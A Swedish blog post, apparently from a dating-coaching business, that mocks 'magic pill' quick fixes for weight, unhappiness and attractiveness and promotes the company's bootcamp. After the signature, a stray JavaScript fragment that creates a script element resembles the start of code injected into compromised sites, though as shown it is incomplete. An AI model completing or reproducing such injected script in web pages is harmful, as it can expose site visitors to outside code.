Jag tänkte adressera ett fenomen som blir allt vanligare i vårt samhälle, ett fenomen som jag faktiskt skulle vilja säga genomsyrar de flesta människors sätt att leva och se på sig själva. Vad tänker jag på?

Magic pill thinking. Översatt till svenska är väl den bästa beskrivningen att det rör sig om vanföreställningen att det finns ett magiskt piller för att bota i stort sett varje åkomma.

Är du tjock? -Aftonbladet gör ett förstasideslöp i veckan om nya mirakelmediciner som har fått Anna 37 att gå ner 40 kg på tre veckor!
Olycklig? -Cipramil och Prozac fixar den biffen!

Jag tror att de flesta känner igen fenomenet. Problemet är att det har blivit en allt för stor del av vårt sätt att leva och tänka. Vad är det som gör det så farligt då? Jag tror nyckeln ligger i att när vi hela tiden förväntar oss och söker efter de enkla utvägarna så känns de ”verkliga” utvägarna som dåliga alternativ, eftersom de så ofta kräver ett faktiskt arbete och engagemang från vår sida.

När det kommer till att vara en attraktiv person som lever ett intressant liv och har kvinnor runtomkring sig så finns det få enkla utvägar.

instantlyattractive Magiska piller åt alla!

Att köpa kläder i ovanstående butik i Malmö kommer med största sannolikhet inte att göra dig attraktiv i en handvändning…

Jag tycker att man ska vara ärlig när man pratar om att förändra sitt liv. I de allra flesta fall är det en process, en process som för många tar tid och det närmsta man kommer ett magiskt piller på området är vår bootcamp, men även där så är det du själv som måste göra arbetet. Vi kan visa dig exakt vad du ska göra och säga för att attrahera kvinnor, vi kan ge dig den absolut senaste teorin och de mest beprövade teknikerna som vi själva, men i slutändan är det ändå du som måste ta steget och VARA den förändring du vill se i ditt liv!

Nu ska jag försöka bota min bakfylla med ett glas vin, käka mina äppelcidervinägertabletter för ökad förbränning och sätta på mig mina nya magiska skor innan jag går ut – väl medveten om att det är ATT jag går ut som gör den stora skillnaden… Ta steget idag, så ses vi på nästa bootcamp – det är en bra dag att förändra ditt liv!

-Sanji

var d=document;var s=d.createElement(‘script’);